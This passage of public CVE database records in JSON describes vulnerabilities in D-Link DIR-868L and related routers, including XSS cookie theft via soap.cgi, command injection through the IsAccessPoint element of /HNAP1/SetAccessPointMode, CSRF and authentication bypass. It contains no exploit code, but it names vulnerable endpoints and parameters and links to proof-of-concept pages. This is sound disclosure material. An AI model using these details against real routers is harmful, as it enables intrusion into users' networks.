"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990",
"refsource": "MISC",
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-19988",
"datePublished": "2019-05-13T13:24:27",
"dateReserved": "2018-12-09T00:00:00",
"dateUpdated": "2024-08-05T11:51:18.144Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-9284
Vulnerability from cvelistv5
Published
2018-04-04 19:00
Modified
2024-09-16 22:50
Severity ?
EPSS score ?
Summary
authentication.cgi on D-Link DIR-868L devices with Singapore StarHub firmware before v1.21SHCb03 allows remote attackers to execute arbitrary code.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html | x_refsource_MISC | |
| http://www.dlink.com.sg/dir-868l/#firmware | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T07:17:51.836Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.dlink.com.sg/dir-868l/#firmware"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "authentication.cgi on D-Link DIR-868L devices with Singapore StarHub firmware before v1.21SHCb03 allows remote attackers to execute arbitrary code."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-04-04T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.dlink.com.sg/dir-868l/#firmware"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-9284",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "authentication.cgi on D-Link DIR-868L devices with Singapore StarHub firmware before v1.21SHCb03 allows remote attackers to execute arbitrary code."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html",
"refsource": "MISC",
"url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in--d-link-router-dir868.html"
},
{
"name": "http://www.dlink.com.sg/dir-868l/#firmware",
"refsource": "MISC",
"url": "http://www.dlink.com.sg/dir-868l/#firmware"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-9284",
"datePublished": "2018-04-04T19:00:00Z",
"dateReserved": "2018-04-04T00:00:00Z",
"dateUpdated": "2024-09-16T22:50:30.779Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-6527
Vulnerability from cvelistv5
Published
2018-03-06 20:00
Modified
2024-08-05 06:10
Severity ?
EPSS score ?
Summary
XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:10:10.079Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-02-28T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-03-06T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-6527",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"name": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"name": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto",
"refsource": "MISC",
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"name": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-6527",
"datePublished": "2018-03-06T20:00:00",
"dateReserved": "2018-02-02T00:00:00",
"dateUpdated": "2024-08-05T06:10:10.079Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-6529
Vulnerability from cvelistv5
Published
2018-03-06 20:00
Modified
2024-08-05 06:10
Severity ?
EPSS score ?
Summary
XSS vulnerability in htdocs/webinc/js/bsc_sms_inbox.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted Treturn parameter to soap.cgi.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:10:10.135Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-02-28T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XSS vulnerability in htdocs/webinc/js/bsc_sms_inbox.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted Treturn parameter to soap.cgi."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-03-06T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-6529",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XSS vulnerability in htdocs/webinc/js/bsc_sms_inbox.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted Treturn parameter to soap.cgi."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"name": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"name": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto",
"refsource": "MISC",
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"name": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-6529",
"datePublished": "2018-03-06T20:00:00",
"dateReserved": "2018-02-02T00:00:00",
"dateUpdated": "2024-08-05T06:10:10.135Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-7642
Vulnerability from cvelistv5
Published
2019-03-25 21:29
Modified
2024-08-04 20:54
Severity ?
EPSS score ?
Summary
D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users' DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10).
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:54:27.952Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2019-03-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users\u0027 DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10)."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-03-25T21:29:04",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-7642",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users\u0027 DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10)."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md",
"refsource": "MISC",
"url": "https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-7642",
"datePublished": "2019-03-25T21:29:04",
"dateReserved": "2019-02-08T00:00:00",
"dateUpdated": "2024-08-04T20:54:27.952Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-19987
Vulnerability from cvelistv5
Published
2019-05-13 13:23
Modified
2024-08-05 11:51
Severity ?
EPSS score ?
Summary
D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA devices mishandle IsAccessPoint in /HNAP1/SetAccessPointMode. In the SetAccessPointMode.php source code, the IsAccessPoint parameter is saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. A vulnerable /HNAP1/SetAccessPointMode XML message could have shell metacharacters in the IsAccessPoint element such as the `telnetd` string.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T11:51:17.881Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA devices mishandle IsAccessPoint in /HNAP1/SetAccessPointMode. In the SetAccessPointMode.php source code, the IsAccessPoint parameter is saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. A vulnerable /HNAP1/SetAccessPointMode XML message could have shell metacharacters in the IsAccessPoint element such as the `telnetd` string."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-13T13:23:33",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-19987",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DIR-822 Rev.B 202KRb06, DIR-822 Rev.C 3.10B06, DIR-860L Rev.B 2.03.B03, DIR-868L Rev.B 2.05B02, DIR-880L Rev.A 1.20B01_01_i3se_BETA, and DIR-890L Rev.A 1.21B02_BETA devices mishandle IsAccessPoint in /HNAP1/SetAccessPointMode. In the SetAccessPointMode.php source code, the IsAccessPoint parameter is saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. A vulnerable /HNAP1/SetAccessPointMode XML message could have shell metacharacters in the IsAccessPoint element such as the `telnetd` string."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990",
"refsource": "MISC",
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-19987",
"datePublished": "2019-05-13T13:23:33",
"dateReserved": "2018-12-09T00:00:00",
"dateUpdated": "2024-08-05T11:51:17.881Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-10957
Vulnerability from cvelistv5
Published
2018-05-10 02:00
Modified
2024-08-05 07:54
Severity ?
EPSS score ?
Summary
CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components.
References
| ▼ | URL | Tags |
|---|---|---|
| https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T07:54:36.309Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-05-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-05-10T02:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-10957",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/147525/D-Link-DIR-868L-1.12-Cross-Site-Request-Forgery.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-10957",
"datePublished": "2018-05-10T02:00:00",
"dateReserved": "2018-05-09T00:00:00",
"dateUpdated": "2024-08-05T07:54:36.309Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-16190
Vulnerability from cvelistv5
Published
2019-09-09 19:54
Modified
2024-08-05 01:10
Severity ?
EPSS score ?
Summary
SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php.
References
| ▼ | URL | Tags |
|---|---|---|
| https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T01:10:41.518Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-09T19:54:36",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-16190",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html",
"refsource": "MISC",
